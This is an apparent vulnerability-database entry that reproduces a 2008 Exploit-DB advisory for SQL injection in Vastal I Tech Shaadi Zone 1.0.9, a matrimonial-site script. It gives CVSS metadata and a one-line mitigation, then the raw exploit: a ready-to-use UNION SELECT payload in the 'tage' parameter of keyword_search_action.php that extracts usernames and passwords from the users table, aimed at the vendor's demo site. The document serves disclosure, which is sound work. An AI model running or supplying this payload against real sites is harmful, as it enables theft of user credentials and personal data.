Vastal I Tech Shaadi Zone 1.0.9 SQL Injection Vulnerability

vendor:

Shaadi Zone

by:

e.wiZz!

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Shaadi Zone

Affected Version From: 1.0.9

Affected Version To: 1.0.9

Patch Exists: NO

Related CWE: N/A

CPE: a:vastal_i_tech:shaadi_zone:1.0.9

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Vastal I Tech Shaadi Zone 1.0.9 SQL Injection Vulnerability

Shaadi Zone is the best solution if you are looking to run a matrimonial services services. An attacker can exploit a SQL injection vulnerability in the keyword_search_action.php file by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'fage' and 'tage' parameters. This can be exploited to disclose the contents of the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being passed to the SQL server.

Source

Exploit-DB raw data:

####################Vastal I Tech Shaadi Zone 1.0.9 SQL Injection Vulnerability##########

########By:   e.wiZz!
########Site: infected.blogger.ba
########Info: Bosnian Idiot FTW!

########Greetz: str0ke,aluigi,suN8Hclf,0in,Rishi Narang,f34r


In the wild...

##############################################################################

#####Info:  Shaadi Zone is the best solution if you are looking to run a matrimonial services services. We have integrated many features which you can use and take full advantage of the matrimonial services. You can run a site like shaadi or bharatmatrimoniy easily.

#####Vulnerability:

http://www.inthewild.xxx/path/keyword_search_action.php?gender=xxx&martial=&fage=xxx&tage=SQL

####PoC on demo site:

http://www.vastal.com/shaadi_zone_1.0.9/keyword_search_action.php?gender=male&martial=&fage=18&tage=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,concat(username,0x3a,password),50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 from users/*

# milw0rm.com [2008-09-05]